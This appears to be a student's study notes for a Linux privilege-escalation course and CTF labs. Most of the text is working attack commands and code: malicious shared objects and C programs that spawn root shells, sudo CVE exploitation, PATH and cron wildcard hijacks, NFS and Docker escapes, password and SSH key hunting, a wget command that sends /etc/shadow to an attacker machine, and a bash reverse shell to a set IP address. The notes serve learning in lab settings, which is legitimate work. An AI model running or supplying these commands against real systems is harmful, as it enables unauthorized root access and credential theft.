Resources:
TCM: https://github.com/TCM-Course-Resources/Linux-Privilege-Escalation-Resources
Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Linux Privilege Escalation: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
Checklist - Linux Privilege Escalation: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
Sushant 747’s Guide (Country dependant - may need VPN): https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html
Initial Enumeration
System Enumeration
→ https://tryhackme.com/room/linuxprivescarena
uname -a
cat /proc/version
cat /etc/issue
lscpu
ps aux
In the initial enum we wanna know the kernel version, architecture and processes.
User Enumeration
whoami
id
sudo -l = to show what sudo permission we have
cat /etc/passwd | cut -d : -f 1 = to show only the users
cat /etc/shadow
cat /etc/group
history
Here we wanna know who we are, what access do we have
Network Enumeration
ifconfig or ip a
route or ip r
arp -a or ip neigh
netstat -ano
What ports are open, what communication exists in the network, which network do we have access
Password Hunting
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2>/dev/null
locate password or pass or pwd | more
find / -name authorized_keys or id_rsa 2>/dev/null
look for password and sensitive files
Exploring Automated Tools
Testing Tools
LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
LinEnum: https://github.com/rebootuser/LinEnum
Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester
Linux Priv Checker: https://github.com/sleventyeleven/linuxprivchecker
Escalation Path: Kernel Exploits
Kernel escalation
Kernel Exploits: https://github.com/lucyoa/kernel-exploits
We can get version with:
uname -a
Go to google > exploitdb or searchsploit
Permissions
Stored Passwords
history
hunt down with linpeas, linenum
Weak File Premissions
- Can we access something we should not?
- Can we modify something?
Do we have access to /etc/shadow?
copy /etc/passwd and /etc/shadow and use 'unshadow <passFile shadowFile>' in kali
crack with hashcat -m 1800 or john
SSH Keys
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null
we can ssh-keygen and add the public key to the target machine:
Or copy the id_rsa file from target and use:
<ssh -i file user@ip>
Escalation Path: Sudo
Allow system administrator to delegate authority to run programs
Shell Escaping
GTFOBins: https://gtfobins.github.io/
after sudo -l = to show files we can run with root privileges
go to GTFOBins to search the files we can execute
Intended Functionality
There is no apache2 in gtfobins, but we can use this functionality to show shadow files:
sudo apache2 -f /etc/shadow
wget example: https://veteransec.com/2018/09/29/hack-the-box-sunday-walkthrough/
In target:
sudo wget --post-file=/etc/shadow <kali ip:port> = We will send the shadow file to our PC, just listen with netcat to grab the file
In kali:
nc -lvnp <port>
LD_PRELOAD
nano shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/fullpath/shell.so <something we can run as root>
Sudo CVEs
CVE-2019-14287
→ https://www.exploit-db.com/exploits/47502
sudo -l
user ALL=(ALL, !root) /bin/bash = user cannot execute /bin/bash
sudo -u#-1 /bin/bash
whoami
root
CVE-2019-18634
→ https://github.com/saleemrashid/sudo-cve-2019-18634
cat /etc/sudoers
sudo -l
sudo -V
In older machines, if pwfeedback is enable = asterisc appers when you type passwords we can use an exploit to escalate that
Escalation Path: SUID (set user ID)
Search for suid files
find / -perm -u=s -type f 2>/dev/null
If we have an upload file directory, but it does not accept php files we can send to burp and fuzz the extension, to find an alternative, like php3,php4, phtml, etc
Go to gtfobins if u find a file with SUID access
Advanced SUID
via Shared Object Injection
find / -perm -4000 -type f -ls 2>/dev/null
strace <file> 2>&1 | grep -i -E "open|access|somethin else" = trace executable file / the grep just filters
if u find a file in crontab or whatever that the system is executing as root, you can create a malicious file with the same name as that file, to make the system execute this instead;
nano malicious.c (btw nano > VIM )
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
gcc -shared -fPIC -o <path/output file> <path of file>
via Binary Symlinks
Nginx Exploit: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
For this to work, we need find the SUID bit set in /usr/bin/sudo file. and vulnerable version of nginx
via Environmental Variables
env
# to show environmental variables
find / -perm -4000 -type f -ls 2>/dev/null
File running with root privileges:
service apache2 start
# this is vulnerable cause is running without the full path for service
Lets remember that the system grabs the full path of service via env $PATH
With that in mind, we can make a malicious file and alter the $PATH variable to run a script.
echo 'int main () { setgid(0); setuid(0); system("/bin/bash"); return 0;} > /tmp/service.c'
gcc /tmp/service.c -o /tmp/service/
export PATH=/tmp:$PATH
File running with root but with full path:
/usr/sbin/service apache2 start
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
# -f = refers to shell functions
Escalation Path: Capabilities
Resources
Linux Privilege Escalation using Capabilities: https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
SUID vs Capabilities: https://mn3m.info/posts/suid-vs-capabilities/
Linux Capabilities Privilege Escalation: https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
Hunting for Capabilities
Its similar to SUID, we can run files with privileges:
getcap -r / 2>/dev/null
# /usr/bin/python2.6 = cap_setuid+ep
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Escalation Path: Scheduled Tasks
Look for Cron
There is others ways to visualize this, if u dont have permission to run crontab, seach for an alternative example:
/etc/init.d | /etc/cron* | /etc/sudoers | ls -al /etc/ | grep cron
cat /etc/crontab
Look for Systemd Timers:
systemctl list-timers --all
Escalation via Cron Paths
If the crontab is executing a file, go to your $PATH variable to see which path u have access. in case u have access in any dir, lets go make something malicious to trick the crontab, to run our file
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
chmod +x /home/user/overwrite.sh
wait the crontab to execute our file
we can ls the /tmp where the copy of the bash is located, when the suid bit is set, we are good to go
/tmp/bash -p
Cron Wildcards
cat /etc/crontab
Lets say there is a file running in crontab, doing tar backup in a directory with (*) = that means all files inside that directory
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > runme.sh
chmod +s runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\runme.sh
# wait crontab to execute
/tmp/bash -p
Cron File Overwrites
If we have privileges to write a file thats running by root in crontab, we just echo something malicious and wait
cat /etc/crontab
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /file/overwrite.sh
# wait crontab
/tmp/bash -p
tips
If you are not finding directories, perhaps u should look for subdomains
wfuzz -c -f sub-fighter -w <wordlist> -u <url> -H "Host: FUZZ.target.com" --hw 290 (exclude 290 errors)
crontab backing up a file with wildcard (*) again:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > file.sh
chmod +x file.sh
Escalation Path: NFS Root Squashing
Identification of the vulnerability
cat /etc/exports
# output example=/tmp *(rw,sync,insecure,"no_root_squash",no_subtree_check)
It means that the /tmp folder is shareable and can be mounted and everything inside the mount gonna be run by root, so we can take advantage of that.
Execution
From kali:
showmount -e <target ip>
mkdir /tmp/mountme
mount -o rw,vers=2 <target ip>:/tmp /tmp/mountme
Now we put something malicious in the mounted folder
echo 'int main() {setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/mountme/malicious.c
gcc /tmp/mountme/malicious.c -o /tmp/mountme/shell
chmod +s /tmp/mountme/shell
From the target machine:
cd /tmp
./shell
root
Escalation Path: Docker
Overview
run linpeas or linenum
Execution
gtfobins again: https://gtfobins.github.io/gtfobins/docker/
docker run -v /:/mnt --rm -it alpine(or bash) chroot /mnt sh
CTFs
- Lazy Admin
- Anonymous
- Tomghost
- ConvertMyVideo
- pspy
- BrainPan1
- bfo
- ConvertMyVideo
${IFS} = using as space
bash -i >& /dev/tcp/10.17.27.169/7778 0>&1
- Found a file running by root with pspy64
- we could add a reverse shell and wait the connection
the others I’ve done before.. so i’ll just follow the videos
Buffer Overflow 101 for brainPan1 CTF
- first FUZZ to find when the application gonna crash
- then: msf-pattern_create -l <number of crash>
- paste to the script
- copy the EIP value
- msf-pattern_offset -l <number of crash> -q <EIP number>
- grab the offset value
- we can send the buffer “A”*<offset value> + “B”*4 = the EIP should be 42424242
- grab badchars chars
- add to your script and u should follow the ESP dump to find the badchars
- or > Using Mona # check how to use Mona from PEH here
# https://johnermac.github.io/notes/pnpt/peh/#exploit-development-using-python3-and-mona)
- take off the badchars of the script
- u should find the pointer with no protections
- invert the pointer
- generate msfvenom with the inverted pointer, open a listener to receive connection
- exploit!